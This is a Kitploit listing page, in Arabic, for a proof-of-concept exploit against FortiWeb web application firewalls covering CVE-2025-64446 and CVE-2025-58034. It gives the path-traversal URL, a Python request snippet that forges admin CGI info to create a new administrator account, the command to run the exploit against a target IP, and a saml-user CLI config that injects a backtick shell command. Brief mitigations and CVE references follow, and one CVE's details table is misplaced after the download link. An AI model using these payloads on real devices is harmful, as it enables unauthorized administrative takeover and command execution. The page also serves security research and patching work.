Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Vulnerability-CVE-2025-64446-CVE-2025-58034 — استغلال PoC لـ FortiWeb CVE-2025-64446 (تجاوز المصادقة عبر اجتياز المسار) وCVE-2025-58034 (حقن أوامر نظام التشغيل) مع تحليل مفصل وإرشادات التخفيف. | Kitploit
أدوات/GitHubGitHub/litndat/vulnerability-cve-2025-64446-cve-2025-58034
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHublitndat/vulnerability-cve-2025-64446-cve-2025-58034

Vulnerability-CVE-2025-64446-CVE-2025-58034

استغلال PoC لـ FortiWeb CVE-2025-64446 (تجاوز المصادقة عبر اجتياز المسار) وCVE-2025-58034 (حقن أوامر نظام التشغيل) مع تحليل مفصل وإرشادات التخفيف.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

محاكاة استغلال FortiWeb (CVE-2025-64446 & CVE-2025-58034)

ملاحظة:

  • هذه الوثيقة مخصصة لأغراض التعلم والبحث الأمني فقط.
  • لا تستخدمها لمهاجمة الأنظمة دون الحصول على إذن مسبق.

1. نظرة عامة

FortiWeb هو جهاز جدار حماية تطبيقات الويب (WAF) يُستخدم لحماية تطبيقات الويب.

في عام 2025، تم اكتشاف ثغرتين خطيرتين:

  • CVE-2025-64446 – تجاوز المصادقة عبر Path Traversal
  • CVE-2025-58034 – OS Command Injection

2. نظرة عامة على CVE-2025-64446

الحقلالمحتوى
نوع الثغرةRelative Path Traversal
Authentication Bypass
السببيعالج FortiWeb المسارات بشكل غير صارم قبل المصادقة:

- التحكم في الوصول يعتمد على سلسلة المسار المنطقي
- عدم تطبيع المسار بشكل كامل
- السماح باستخدام ../ للوصول إلى الموارد الداخلية
الوصفيمكن الوصول إلى بعض نقاط نهاية الإدارة (endpoints) دون مصادقة صالحة
الأثر- تجاوز المصادقة بالكامل
- وصول غير مصرح به إلى وظائف الإدارة
- كسر نموذج الصلاحيات
الإصدارات المتأثرة- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

مثال:

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. نظرة عامة على CVE-2025-58034


4. العملية التجريبية (POC)

4.1. تجهيز البيئة:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

يساعد ذلك في تجنب تعارض إصدارات المكتبات، ويضمن استقرار بيئة العمل، ويحد من التأثير على النظام

image

4.2 الاستغلال

الحمولة

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

شغّل الأداة باستخدام Python3:

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target>: عنوان IP هنا هو اسم مضيف جهاز FortiWeb.
image

تم الحصول على اسم المستخدم وكلمة المرور -> قم بتسجيل الدخول

image image

تم الاستغلال بنجاح وإنشاء حساب جديد بصلاحيات admin.

4.3 استغلال CVE-2025-58034 بعد تسجيل الدخول إلى الحساب

بعد تسجيل الدخول بنجاح باستخدام حساب الإدارة المُنشأ حديثًا، يمكن للمهاجم استغلال ثغرة حقن الأوامر المُصادَق عليها عبر طلبات مُصنَّعة خصيصًا أو مباشرة عبر واجهة سطر أوامر FortiWeb CLI:

root@kitploit:~
config user saml-user

edit "`id`" ## nhập lệnh tại đây

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

سيقوم FortiWeb بالخروج من سلسلة الإعدادات وتنفيذ الأمر id أثناء عملية إعداد saml-user.

5. بعض طرق التخفيف من الثغرات

  • تحديث FortiWeb إلى الإصدار المُصحَّح.
  • تقييد الوصول إلى واجهة الإدارة.
  • عدم تعريض واجهة الإدارة للإنترنت.
  • فحص حسابات admin غير المعتادة.

6. مراجع إضافية

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
تنزيل الأداة
الحقلالمحتوى
نوع الثغرةOS Command Injection (CWE-78)
السببيعالج FortiWeb الإدخال (input) بشكل غير آمن عند تنفيذ أوامر نظام التشغيل:

- عدم التحقق من صحة الإدخال
- عدم escape الأحرف الخاصة
- تمرير بيانات المستخدم مباشرة إلى أوامر النظام
الوصفتتطلب الثغرة مصادقة ولكنها تسمح بحقن أوامر النظام
الأثر- تنفيذ أوامر غير مقصودة
- الوصول إلى موارد النظام
- التأثير على السلامة والتوافر
الإصدارات المتأثرة- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11